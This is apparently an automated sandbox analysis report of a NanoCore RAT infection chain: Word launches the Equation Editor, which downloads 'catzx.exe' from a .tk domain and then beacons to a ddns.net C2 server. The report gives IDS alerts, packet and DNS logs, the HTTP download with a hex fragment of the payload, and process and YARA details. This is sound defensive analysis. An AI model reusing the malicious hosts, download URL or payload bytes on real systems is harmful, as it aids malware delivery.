                                                          10/26/21-14:33:23.506231TCP2025019ET TROJAN Possible NanoCore C2 60B491711665192.168.2.22103.133.109.121
                                                          10/26/21-14:33:41.021024UDP254DNS SPOOF query response with TTL of 1 min. and no authority53517718.8.8.8192.168.2.22
                                                          10/26/21-14:33:41.331307TCP2025019ET TROJAN Possible NanoCore C2 60B491731665192.168.2.22103.133.109.121
                                                          10/26/21-14:33:46.009612TCP2025019ET TROJAN Possible NanoCore C2 60B491741665192.168.2.22103.133.109.121
                                                          10/26/21-14:33:50.682297TCP2025019ET TROJAN Possible NanoCore C2 60B491751665192.168.2.22103.133.109.121
                                                          10/26/21-14:33:55.052700UDP254DNS SPOOF query response with TTL of 1 min. and no authority53500728.8.8.8192.168.2.22
                                                          10/26/21-14:33:55.382395TCP2025019ET TROJAN Possible NanoCore C2 60B491761665192.168.2.22103.133.109.121
                                                          10/26/21-14:34:14.738599TCP2025019ET TROJAN Possible NanoCore C2 60B491771665192.168.2.22103.133.109.121
                                                          10/26/21-14:34:19.468378TCP2025019ET TROJAN Possible NanoCore C2 60B491781665192.168.2.22103.133.109.121
                                                          10/26/21-14:34:24.111348TCP2025019ET TROJAN Possible NanoCore C2 60B491791665192.168.2.22103.133.109.121
                                                          10/26/21-14:34:28.776193TCP2025019ET TROJAN Possible NanoCore C2 60B491801665192.168.2.22103.133.109.121
                                                          10/26/21-14:34:33.840839TCP2025019ET TROJAN Possible NanoCore C2 60B491811665192.168.2.22103.133.109.121
                                                          10/26/21-14:34:38.459896TCP2025019ET TROJAN Possible NanoCore C2 60B491821665192.168.2.22103.133.109.121

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 26, 2021 14:32:28.399044037 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.425302982 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.425436974 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.425699949 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.453636885 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.454737902 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.454761982 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.454869032 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.454936981 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.454955101 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.454981089 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.454993010 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.454998970 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.455018044 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.455027103 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.455034971 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.455035925 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.455049992 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.455051899 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.455070019 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.455071926 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.455087900 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.455101967 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.464797974 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480618000 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480663061 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480690002 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480712891 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480730057 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480747938 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480751991 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480765104 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480781078 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480781078 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480784893 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480787992 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480798006 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480798960 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480817080 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480819941 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480837107 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480840921 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480854034 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480861902 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480871916 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480875969 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480889082 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480891943 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480907917 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480910063 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480925083 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480930090 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480942965 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480945110 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480959892 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480979919 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480982065 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480988026 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.480998039 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.480998039 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.481014967 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.481031895 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.482494116 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.506870985 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.506901026 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.506916046 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.506932974 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507008076 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507038116 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507366896 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507385015 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507422924 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507441044 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507452965 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507457018 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507467031 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507473946 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507479906 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507493019 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507500887 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507514000 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507517099 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507533073 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507544041 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507550001 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507550955 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507575989 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507584095 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507592916 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507602930 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507621050 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507635117 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507638931 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507654905 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507662058 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507663965 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507673979 CEST4916580192.168.2.222.56.59.211
                                                          Oct 26, 2021 14:32:28.507683039 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507699013 CEST80491652.56.59.211192.168.2.22
                                                          Oct 26, 2021 14:32:28.507711887 CEST4916580192.168.2.222.56.59.211

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 26, 2021 14:32:28.342478991 CEST5216753192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:32:28.361212969 CEST53521678.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:32:28.361577034 CEST5216753192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:32:28.379965067 CEST53521678.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:32:46.266288042 CEST5059153192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:32:46.286371946 CEST53505918.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:32:51.516520023 CEST5780553192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:32:51.536900043 CEST53578058.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:32:51.537348986 CEST5780553192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:32:51.555778980 CEST53578058.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:32:57.731529951 CEST5903053192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:32:57.749866009 CEST53590308.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:33:10.443394899 CEST5918553192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:33:10.461741924 CEST53591858.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:33:16.875482082 CEST5561653192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:33:16.896073103 CEST53556168.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:33:23.127830982 CEST4997253192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:33:23.148868084 CEST53499728.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:33:41.000914097 CEST5177153192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:33:41.021023989 CEST53517718.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:33:45.678149939 CEST5986753192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:33:45.696860075 CEST53598678.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:33:50.365366936 CEST5031553192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:33:50.383882999 CEST53503158.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:33:55.032602072 CEST5007253192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:33:55.052700043 CEST53500728.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:33:55.053576946 CEST5007253192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:33:55.071458101 CEST53500728.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:34:12.061791897 CEST5430453192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:34:12.080410957 CEST53543048.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:34:12.242664099 CEST5430453192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:34:12.266231060 CEST53543048.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:34:14.397547007 CEST5430453192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:34:14.416179895 CEST53543048.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:34:19.109601021 CEST4989453192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:34:19.127985001 CEST53498948.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:34:23.798602104 CEST6464553192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:34:23.818476915 CEST53646458.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:34:28.457179070 CEST5374553192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:34:28.473581076 CEST53537458.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:34:33.526659966 CEST5435853192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:34:33.544327974 CEST53543588.8.8.8192.168.2.22
                                                          Oct 26, 2021 14:34:38.143464088 CEST6501753192.168.2.228.8.8.8
                                                          Oct 26, 2021 14:34:38.161930084 CEST53650178.8.8.8192.168.2.22

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Oct 26, 2021 14:32:28.342478991 CEST192.168.2.228.8.8.80xd208Standard query (0)binatonezx.tkA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:28.361577034 CEST192.168.2.228.8.8.80xd208Standard query (0)binatonezx.tkA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:46.266288042 CEST192.168.2.228.8.8.80xcfeStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:51.516520023 CEST192.168.2.228.8.8.80x15Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:51.537348986 CEST192.168.2.228.8.8.80x15Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:57.731529951 CEST192.168.2.228.8.8.80xc64aStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:10.443394899 CEST192.168.2.228.8.8.80x36bfStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:16.875482082 CEST192.168.2.228.8.8.80xb0d9Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:23.127830982 CEST192.168.2.228.8.8.80xdcceStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:41.000914097 CEST192.168.2.228.8.8.80x4f0aStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:45.678149939 CEST192.168.2.228.8.8.80x57aStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:50.365366936 CEST192.168.2.228.8.8.80x29e5Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:55.032602072 CEST192.168.2.228.8.8.80x2a58Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:55.053576946 CEST192.168.2.228.8.8.80x2a58Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:12.061791897 CEST192.168.2.228.8.8.80xe108Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:12.242664099 CEST192.168.2.228.8.8.80xe108Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:14.397547007 CEST192.168.2.228.8.8.80xe108Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:19.109601021 CEST192.168.2.228.8.8.80xeef1Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:23.798602104 CEST192.168.2.228.8.8.80xc9c2Standard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:28.457179070 CEST192.168.2.228.8.8.80x8c8bStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:33.526659966 CEST192.168.2.228.8.8.80xc6cbStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:38.143464088 CEST192.168.2.228.8.8.80xa5daStandard query (0)drrkingsleym001.ddns.netA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Oct 26, 2021 14:32:28.361212969 CEST8.8.8.8192.168.2.220xd208No error (0)binatonezx.tk2.56.59.211A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:28.379965067 CEST8.8.8.8192.168.2.220xd208No error (0)binatonezx.tk2.56.59.211A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:46.286371946 CEST8.8.8.8192.168.2.220xcfeNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:51.536900043 CEST8.8.8.8192.168.2.220x15No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:51.555778980 CEST8.8.8.8192.168.2.220x15No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:32:57.749866009 CEST8.8.8.8192.168.2.220xc64aNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:10.461741924 CEST8.8.8.8192.168.2.220x36bfNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:16.896073103 CEST8.8.8.8192.168.2.220xb0d9No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:23.148868084 CEST8.8.8.8192.168.2.220xdcceNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:41.021023989 CEST8.8.8.8192.168.2.220x4f0aNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:45.696860075 CEST8.8.8.8192.168.2.220x57aNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:50.383882999 CEST8.8.8.8192.168.2.220x29e5No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:55.052700043 CEST8.8.8.8192.168.2.220x2a58No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:33:55.071458101 CEST8.8.8.8192.168.2.220x2a58No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:12.080410957 CEST8.8.8.8192.168.2.220xe108No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:12.266231060 CEST8.8.8.8192.168.2.220xe108No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:14.416179895 CEST8.8.8.8192.168.2.220xe108No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:19.127985001 CEST8.8.8.8192.168.2.220xeef1No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:23.818476915 CEST8.8.8.8192.168.2.220xc9c2No error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:28.473581076 CEST8.8.8.8192.168.2.220x8c8bNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:33.544327974 CEST8.8.8.8192.168.2.220xc6cbNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)
                                                          Oct 26, 2021 14:34:38.161930084 CEST8.8.8.8192.168.2.220xa5daNo error (0)drrkingsleym001.ddns.net103.133.109.121A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • binatonezx.tk

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.22491652.56.59.21180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 26, 2021 14:32:28.425699949 CEST0OUTGET /catzx.exe HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                          Host: binatonezx.tk
                                                          Connection: Keep-Alive
                                                          Oct 26, 2021 14:32:28.454737902 CEST2INHTTP/1.1 200 OK
                                                          Date: Tue, 26 Oct 2021 12:32:28 GMT
                                                          Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                                          Last-Modified: Tue, 26 Oct 2021 07:03:38 GMT
                                                          ETag: "59e00-5cf3c13a7ae42"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 368128
                                                          Vary: User-Agent
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-msdownload
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 87 77 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 05 00 00 08 00 00 00 00 00 00 f6 b2 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 b2 05 00 4f 00 00 00 00 c0 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 92 05 00 00 20 00 00 00 94 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 c0 05 00 00 06 00 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b2 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 3f 00 00 e4 41 00 00 03 00 00 00 7d 00 00 06 a4 81 00 00 00 31 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 00 00 00 13 30 03 00 38 00 00 00 01 00 00 11 00 73 0d 00 00 06 25 1f 42 6f 02 00 00 06 00 25 1f 50 6f 04 00 00 06 00 25 1f 44 6f 06 00 00 06 00 25 1f 49 6f 08 00 00 06 00 25 1f 57 6f 0a 00 00 06 00 0a 2b 00 06 2a 13 30 03 00 38 00 00 00 01 00 00 11 00 73 0d 00 00 06 25 1f 6f 6f 02 00 00 06 00 25 1f 2b 6f 04 00 00 06 00 25 1f 2d 6f 06 00 00 06 00 25 1f 2a 6f 08 00 00 06 00 25 1f 3d 6f 0a 00 00 06 00 0a 2b 00 06 2a 22 02 28 14 00 00 0a 00 2a 00 00 00 13 30 04 00 20 00 00 00 02 00 00 11 00 19 8d 0f 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 37 00 00 70 a2 25 18 02 a2 0a 2b 00 06 2a 26 02 28 14 00 00 0a 00 00 2a 00 00 13 30 02 00 30 00 00 00 03 00 00 11 00 03 6f 23 00 00 06 04 6f 4f 00 00 06 33 10 03 6f 25 00 00 06 04 6f 51 00 00 06 fe 01 2b 01 16 0a 06 2c 05 00 17 0b 2b 05 00 16 0b 2b 00 07 2a 13 30 02 00 30 00 00 00 03 00 00 11 00 03 6f 23 00 00 06 04 6f 23 00 00 06 33 10 03 6f 25 00 00 06 04 6f 25 00 00 06 fe 01 2b 01 16 0a 06 2c 05 00 17 0b 2b 05
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELXwa0 @ @O H.text `.rsrc@@.reloc@BH?A}1{*"}*{*"}*{*"}*{*"}*{*"}*08s%Bo%Po%Do%Io%Wo+*08s%oo%+o%-o%*o%=o+*"(*0 %rp%r7p%+*&(*00o#oO3o%oQ+,++*00o#o#3o%o%+,+


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:14:31:29
                                                          Start date:26/10/2021
                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                          Imagebase:0x13fdb0000
                                                          File size:1423704 bytes
                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:14:31:31
                                                          Start date:26/10/2021
                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                          Imagebase:0x400000
                                                          File size:543304 bytes
                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:14:31:32
                                                          Start date:26/10/2021
                                                          Path:C:\Users\user\AppData\Roaming\catzjt7863.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\catzjt7863.exe
                                                          Imagebase:0x960000
                                                          File size:368128 bytes
                                                          MD5 hash:ACE96CF7EF24EEAC993B4DA172A5A8F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, Author: Florian Roth
